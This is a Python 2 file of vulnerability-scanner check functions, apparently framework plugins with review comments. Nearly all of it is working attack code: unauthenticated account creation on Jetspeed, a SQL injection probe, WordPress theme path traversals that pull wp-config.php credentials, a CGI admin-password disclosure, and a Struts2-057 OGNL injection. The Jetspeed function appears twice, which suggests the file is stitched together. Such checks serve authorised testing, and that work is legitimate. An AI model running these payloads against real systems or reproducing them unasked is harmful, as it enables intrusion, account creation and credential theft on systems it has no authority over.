def poc(url):
    """
    Check for an unauthenticated Jetspeed user-manager REST endpoint.

    The probe POSTs the same user-creation form twice to
    /jetspeed/services/usermanager/users/ and treats a
    PRINCIPAL_ALREADY_EXISTS error on the second call as proof that the
    first call created the account. Side effect for authorized tests:
    a randomly named account is left on the target; nothing here removes it.

    :param url: Target URL or host[:port]; a scheme is added when missing.
    :return: True when the indicator is seen and ENABLE_EXP is off, False on
             a negative result or (with ENABLE_EXP off) on a request error;
             otherwise falls through to None.
    """
    # Port 443 without a scheme is taken as HTTPS; everything else as HTTP.
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    url = get_domain(url).rstrip('/')
    # Random credentials so the first POST does not collide with a real user.
    user = randomString(6)
    password = randomString(6)
    url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
    data1 = {
        'name': user,
        'password': password,
        'password_confirm': password,
        'user_name_given': 'foo',
        'user_name_family': 'bar',
        'user_email': '*****@*****.**',
        'newrule': ''
    }
    try:
        # First POST creates the principal; only the second response is read.
        # NOTE(review): `firefox` is passed uncalled here — presumably a UA
        # string constant; confirm against the module that defines it.
        requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False)
        c = requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False).content
        # response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
        if 'PRINCIPAL_ALREADY_EXISTS' in c:
            if not ENABLE_EXP:
                return True
        # NOTE(review): the original indentation of this else was lost in the
        # collapsed source; it is read here as the negative branch of the
        # indicator check — confirm against the upstream file.
        else:
            return False
    except Exception, e:
        # Request errors are swallowed; with ENABLE_EXP on, this returns None.
        if not ENABLE_EXP:
            return False
def poc(url):
    """
    Boolean-based differential check for a SQL injection in the `galleryid`
    POST parameter of the load_videos_content task.

    Two otherwise identical requests are sent, one with an always-true and
    one with an always-false condition; differing body lengths on two 200
    responses are taken as the indicator. Length-only comparison can
    produce false positives on pages with dynamic content.

    :param url: Target URL; resolved to a request entry point via get_entry.
    :return: True when the responses differ, a '[Uncertain,WAF detected!]'
             string when CHECK_WAF flags a WAF, False otherwise (including
             any request error).
    """
    target = get_entry(url)
    if not target:
        return False
    if CHECK_WAF and has_waf(target):
        return '[Uncertain,WAF detected!] ' + get_domain(target)
    # [P] is the substitution point for the two test conditions below.
    data_temp = "page=1&galleryid=[P]&task=load_videos_content&perpage=20&linkbutton=2"
    # Content-Type needed
    headers = {
        'User-Agent': loadfakeuseragent(),
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    try:
        # NOTE(review): neither POST sets a timeout, so a stalled target can
        # hang the scanner; sibling checks in this corpus use timeout=10.
        r1 = requests.post(target, headers=headers, data=data_temp.replace('[P]', '-1 OR 1=1'))
        r2 = requests.post(target, headers=headers, data=data_temp.replace('[P]', '-1 OR 1=2'))
    except:
        # Bare except: any failure (including KeyboardInterrupt) reads as "not vulnerable".
        return False
    if r1.status_code == r2.status_code == 200 and len(r1.content) != len(r2.content):
        return True
    return False
def poc(url):
    """
    Check for a path traversal in the ypo-theme download.php endpoint.

    Requests the theme's download handler with a traversal to wp-config.php
    and looks for two strings that only appear in a served WordPress config
    file. A hit means the target discloses its database credentials.

    :param url: Target URL or host; 'http://' is added when no scheme is given.
    :return: The probe URL on a hit; falls through to None otherwise.
    """
    if '://' not in url:
        url = 'http://' + url
    payload = '/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php'
    target = get_domain(url).rstrip('/') + payload
    try:
        r = urllib2.urlopen(target, timeout=5).read()  # cannot use requests here
        # Both markers must be present to reduce false positives from error pages.
        if "define('DB_PASSWORD'" in r and '@package WordPress' in r:
            return target
    except Exception, e:
        # Network and HTTP errors are treated as a miss.
        pass
    # NOTE(review): no explicit `return False` here, unlike the sibling
    # checks — callers testing `is False` will not see a miss.
def poc(url):
    """
    Check for a path traversal in the bonkersbeat theme's dl-skin.php.

    POSTs a traversal path in `_mysite_download_skin` and looks for two
    strings that only appear in a served WordPress config file. A hit means
    the target discloses its database credentials.

    :param url: Target URL or host; 'http://' is added when no scheme is given.
    :return: The probe URL on a hit, False otherwise.
    """
    if '://' not in url:
        url = 'http://' + url
    payload = '/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php'
    target = get_domain(url).rstrip('/') + payload
    try:
        # Passing `data` makes urlopen issue a POST.
        r = urllib2.urlopen(target, data="_mysite_download_skin=../../../../../wp-config.php", timeout=5).read()
        # Both markers must be present to reduce false positives from error pages.
        if "define('DB_PASSWORD'" in r and '@package WordPress' in r:
            return target
    except Exception:
        # Network and HTTP errors are treated as a miss.
        pass
    return False
def poc(url):
    """
    Check for credential disclosure via /cgi-bin/readfile.cgi?query=ADMINID.

    A response containing 'var Adm_Pass1' indicates the CGI returns the
    administrator credential block without authentication.

    :param url: Target URL or host; 'http://' is added when no scheme is given.
    :return: The probe URL on a hit, False otherwise.
    """
    if '://' not in url:
        url = 'http://' + url
    payload = "/cgi-bin/readfile.cgi?query=ADMINID"
    # NOTE(review): unlike the sibling checks there is no rstrip('/') here;
    # if get_domain can return a trailing slash this yields '//cgi-bin/...'.
    target_url = get_domain(url) + payload
    try:
        r = requests.get(target_url, timeout=10)
        if 'var Adm_Pass1' in r.content:
            return target_url
    except Exception:
        # Network and HTTP errors are treated as a miss.
        pass
    return False
def poc(url):
    """
    Check whether an overlong-UTF-8 encoded '..' (%c0%ae%c0%ae) under /theme/
    escapes the theme directory and serves META-INF/MANIFEST.MF.

    :param url: Target URL or host; 'http://' is added when no scheme is given.
    :return: True when the response contains 'Version', False otherwise
             (including any request error).
    """
    if '://' not in url:
        url = 'http://' + url
    url = get_domain(url)
    payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
    try:
        c = requests.get(url + payload, headers={'User-Agent': firefox()}, timeout=10).content
    except Exception:
        return False
    # NOTE(review): 'Version' is a weak indicator — any page mentioning a
    # version (footers, error pages) matches; a manifest-specific key such
    # as the 'Manifest-Version:' line would cut false positives.
    if 'Version' in c:
        return True
    return False
def poc(url, **kwargs):
    """
    Check for Struts2-057 (OGNL evaluation in the namespace of a redirect).

    For each candidate path from iterate_path, a path segment containing an
    arithmetic OGNL expression on two random numbers is requested; a 302 whose
    Location header contains the computed difference, confirmed by a second
    request to that Location, is taken as evaluation on the server.

    :param url: Target URL; overridden by 'http://<ip>:<port>' when kwargs
                carry 'ip' (and 'port').
    :return: A message naming Struts2-057 and the probe URL on a hit;
             falls through to None otherwise.
    """
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url
    timeout = 10
    domain = get_domain(url)
    # NOTE(review): `proxies` is assigned but never passed to requests.get,
    # so no traffic goes through 127.0.0.1:9999; remove it or wire it in.
    proxies = {'http': '127.0.0.1:9999'}
    headers = {
        "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0'
    }
    # Random operands make the expected result unguessable and unique per run.
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    parser = urlparse(url)
    if parser.path:
        # Keep only the last path segment of the supplied URL as the action name.
        _path_list = parser.path.replace('//', '/').strip('/').split('/')[-1]
    else:
        _path_list = 'index.action'
    url_list = iterate_path(url)
    for urls in url_list:
        url = urls + '/${%s-%s}/%s' % (ran_a, ran_b, _path_list)
        try:
            # Redirects are not followed so the raw Location header can be inspected.
            res = requests.get(
                url,
                timeout=timeout,
                headers=headers,
                allow_redirects=False,
                verify=False,
            )
            if res.status_code == 302 and res.headers.get('Location') is not None and str(ran_check) in res.headers.get('Location'):
                urlLoca = res.headers.get('Location')
                # Second request confirms the computed value also appears in the body.
                res2 = requests.get(domain + urlLoca, headers=headers, timeout=6, allow_redirects=False, verify=False)
                if str(ran_check) in res2.text:
                    result = "目标存在 Struts2-057, check url: %s" % url
                    return result
        except:
            # Bare except: per-path request errors are ignored and the next path is tried.
            pass
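def checkCDN(url):
    """
    Detect if the website is using CDN or cloud-based web application firewall

    The check is delegated to the external service at ce.cloud.360.cn: a
    detection task is submitted for the target domain, the service's probe
    nodes are given time to resolve it, and the distinct IPs they report are
    counted. More than one distinct IP is reported as a CDN.

    Note that the target hostname is sent to a third party; do not use this
    on targets whose names must not leave the assessment environment.

    :param url: Target URL or Domain
    :return: A result string: the domain followed by ' [Target Unknown]',
             or by an optional ' [CDN Found!]' tag plus node and IP counts.
    """
    url = 'http://' + url if '://' not in url else url
    url = get_domain(url)
    base = 'http://ce.cloud.360.cn'
    # Every call carries a timeout so a stalled third-party service cannot
    # hang the scan indefinitely; the session is closed on all paths.
    timeout = 10
    s = requests.session()
    try:
        # Hidden form fields from the landing page are needed to create a task.
        data1 = _get_static_post_attr(s.get(base + '/', timeout=timeout).content)
        data1['domain'] = url
        s.post(base + '/task', data=data1, timeout=timeout)
        headers = {
            'X-Requested-With': 'XMLHttpRequest',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
        }
        s.post(base + '/Tasks/detect', data=data1, headers=headers, timeout=timeout)
        time.sleep(5)  # 5 sec delay for nodes to detect
        # Pre-encoded node id list (ids[]=...) expected by the service's result endpoint.
        data = 'domain=' + url + '&type=get&ids%5B%5D=1&ids%5B%5D=2&ids%5B%5D=3&ids%5B%5D=4&ids%5B%5D=5&ids%5B%5D=6&ids%5B%5D=7&ids%5B%5D=8&ids%5B%5D=9&ids%5B%5D=16&ids%5B%5D=18&ids%5B%5D=22&ids%5B%5D=23&ids%5B%5D=41&ids%5B%5D=45&ids%5B%5D=46&ids%5B%5D=47&ids%5B%5D=49&ids%5B%5D=50&ids%5B%5D=54&ids%5B%5D=57&ids%5B%5D=58&ids%5B%5D=61&ids%5B%5D=62&ids%5B%5D=64&ids%5B%5D=71&ids%5B%5D=78&ids%5B%5D=79&ids%5B%5D=80&ids%5B%5D=93&ids%5B%5D=99&ids%5B%5D=100&ids%5B%5D=101&ids%5B%5D=103&ids%5B%5D=104&ids%5B%5D=106&ids%5B%5D=110&ids%5B%5D=112&ids%5B%5D=114&ids%5B%5D=116&ids%5B%5D=117&ids%5B%5D=118&ids%5B%5D=119&ids%5B%5D=120&ids%5B%5D=121&ids%5B%5D=122&user_ip_list='
        r = s.post(base + '/GetData/getTaskDatas', data=data, headers=headers, timeout=timeout)
    finally:
        s.close()
    ips = re.findall('"ip":"(.*?)"', r.content)
    ans = list(set(ips))
    msg = url
    if not ips:
        msg += ' [Target Unknown]'
        return msg
    # Several distinct IPs across probe nodes is the CDN indicator.
    msg += ' [CDN Found!]' if len(ans) > 1 else ''
    msg += ' Nodes:' + str(len(ips))
    msg += (' IP(%s):' % str(len(ans))) + ' '.join(ans)
    return msg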
def poc(url):
    """
    Check for an unauthenticated Jetspeed user-manager REST endpoint.

    The probe POSTs the same user-creation form twice to
    /jetspeed/services/usermanager/users/ and treats a
    PRINCIPAL_ALREADY_EXISTS error on the second call as proof that the
    first call created the account. Side effect for authorized tests:
    a randomly named account is left on the target; nothing here removes it.

    :param url: Target URL or host[:port]; a scheme is added when missing.
    :return: True when the indicator is seen and ENABLE_EXP is off, False on
             a negative result or (with ENABLE_EXP off) on a request error;
             otherwise falls through to None.
    """
    # Port 443 without a scheme is taken as HTTPS; everything else as HTTP.
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    url = get_domain(url).rstrip('/')
    # Random credentials so the first POST does not collide with a real user.
    user = randomString(6)
    password = randomString(6)
    url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
    data1 = {
        'name': user,
        'password': password,
        'password_confirm': password,
        'user_name_given': 'foo',
        'user_name_family': 'bar',
        'user_email': '*****@*****.**',
        'newrule': ''
    }
    try:
        # First POST creates the principal; only the second response is read.
        # NOTE(review): `firefox` is passed uncalled here — presumably a UA
        # string constant; confirm against the module that defines it.
        requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False)
        c = requests.post(url1, data=data1, headers={
            'User-Agent': firefox
        }, timeout=10, verify=False).content
        # response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
        if 'PRINCIPAL_ALREADY_EXISTS' in c:
            if not ENABLE_EXP:
                return True
        # NOTE(review): the original indentation of this else was lost in the
        # collapsed source; it is read here as the negative branch of the
        # indicator check — confirm against the upstream file.
        else:
            return False
    except Exception, e:
        # Request errors are swallowed; with ENABLE_EXP on, this returns None.
        if not ENABLE_EXP:
            return False